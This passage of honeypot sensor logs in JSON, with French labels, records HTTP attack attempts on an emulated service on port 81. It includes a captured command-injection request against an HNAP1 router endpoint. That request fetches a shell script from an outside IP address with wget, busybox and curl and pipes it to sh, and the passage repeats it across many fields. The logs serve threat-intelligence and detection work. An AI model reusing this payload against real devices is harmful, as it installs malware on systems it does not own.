\u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60\u0022, \u0022waf_tags\u0022: [\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60\u0022, \u0022waf_tags\u0022: [\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60 HTTP\/1.1\\r\\nHost: 62.3.\u0022, \u0022payload_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00229d44e83f3b30377944a390c9e8c4b10877036d17\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhna\u2026\u0022, \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.4\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 13 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 65\/100 (\u00c9lev\u00e9) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 65}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 65, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhna\u2026\u0022, \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.4\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 13 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 13 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022, \u0022http_no_ua\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022, \u0022http_no_ua\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":556},{"id":11860760,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59844,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":0,"waf_tags":"[]","http_method":"POST","http_target":"\/login.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00225d1c064d8f41c9821d75c9116650ed5db6a1a5ee\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 136, \u0022payload_entropy\u0022: 4.9761777776165665, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 8.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 4.8, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 46, \u0022tag_count\u0022: 5, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00225c06621228833b0961da72fdc152acd8c9d6f969\u0022, \u0022event_fingerprint\u0022: \u0022005725989162d97297ad2efe57e9034bd3e3f7db\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022confidence\u0022: 0.97, \u0022classification_confidence\u0022: 0.97, \u0022precision_score\u0022: 97, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 46}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 97.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00221ec4378360992cabcec4fc0d9d93b72f\u0022, \u0022path_pattern_hash\u0022: \u0022f6e9baaa731f11923b2ba9541a8713d5\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 46}, \u0022payload_preview\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002292b3a8d1724183e527ea235e9dc80a72fdc4e71d\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 97 % \u2014 5 signal(aux) capteur\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 46\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 97 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 97, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 46}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 46, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022], \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 97 % \u2014 5 signal(aux) capteur\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 97 % \u2014 Score WAF 8\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":136},{"id":11860761,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59848,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/diagnostic.php","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00220b165bcd0084116a55970e964cd92616df411a98\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 376, \u0022payload_entropy\u0022: 5.232151302314721, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022e29f67b8c57780c9936d4829c43cb1c5afa76565\u0022, \u0022event_fingerprint\u0022: \u0022eaa4f03a17ddb161d0eaedab5be8b53af4201b5f\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], 